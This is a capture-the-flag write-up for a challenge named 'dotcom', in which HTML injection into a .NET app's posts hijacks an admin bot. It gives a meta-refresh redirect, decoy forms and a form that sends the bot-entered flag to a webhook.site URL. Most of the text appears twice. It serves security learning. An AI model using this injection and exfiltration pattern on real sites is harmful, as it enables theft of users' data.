dotcom
SRC: https://library.m0unt41n.ch/challenges/dotcom
Solved this chall locally, submitted publicly shared flag. (hope thats fine) Reported chall as broken and fixed it.
There is a .NET server and a BOT component, we need to make the bot write the flag into a textArea and somehow exfil the flag.
Due too the known bot behaviour we can abuse the broken logic of how posts are handled and viewed... We can inject html and perform actions essentially achieving "XSS".
1. Step or the first main issue is that the bot presses the back key... essentially going back too the main dashboard. We prevent this with abusing the 1 second delay of the bot and instant redirecting him too our malicious post: <meta http-equiv="refresh" content="0; URL=/content/10faf2c4-0879-4e53-8201-c01b4a8cd8a0">
2. next up we need to provide the buttons the bot wants/needs to press before he actually writes the flag into id="textArea", so we craft some html too just allow button presses and prevent bot exceptions:
and last but not least if the bot hasn't ran into an exception he will write the flag into said id textArea and presses the button submit.. we will craft a malicious form which will send the flag too our webhook...
So final flow:
1. post will just redirect too malicious post which will be shown as content/id -> which results in no other boilerplate html (like the actual back button).
2. Our malicious html will allow the bot too perform his button presses, writing of flag and submitting the malicious form
3. yeehaa we get the flag delivered too our doorstep
SRC: https://library.m0unt41n.ch/challenges/dotcom
Solved this chall locally, submitted publicly shared flag. (hope thats fine) Reported chall as broken and fixed it.
There is a .NET server and a BOT component, we need to make the bot write the flag into a textArea and somehow exfil the flag.
Due too the known bot behaviour we can abuse the broken logic of how posts are handled and viewed... We can inject html and perform actions essentially achieving "XSS".
1. Step or the first main issue is that the bot presses the back key... essentially going back too the main dashboard. We prevent this with abusing the 1 second delay of the bot and instant redirecting him too our malicious post: <meta http-equiv="refresh" content="0; URL=/content/10faf2c4-0879-4e53-8201-c01b4a8cd8a0">
2. next up we need to provide the buttons the bot wants/needs to press before he actually writes the flag into id="textArea", so we craft some html too just allow button presses and prevent bot exceptions:
HTML:
<form action="#" method="GET">
<input id="back" type="submit">
</form>
<form action="#" method="GET">
<input id="create" type="submit" value="create">
</form>and last but not least if the bot hasn't ran into an exception he will write the flag into said id textArea and presses the button submit.. we will craft a malicious form which will send the flag too our webhook...
HTML:
<form action="https://webhook.site/x" method="GET">
<input id="textArea" name="flag" type="text">
<input id="submit" type="submit" value="send flag">
</form>So final flow:
1. post will just redirect too malicious post which will be shown as content/id -> which results in no other boilerplate html (like the actual back button).
2. Our malicious html will allow the bot too perform his button presses, writing of flag and submitting the malicious form
3. yeehaa we get the flag delivered too our doorstep
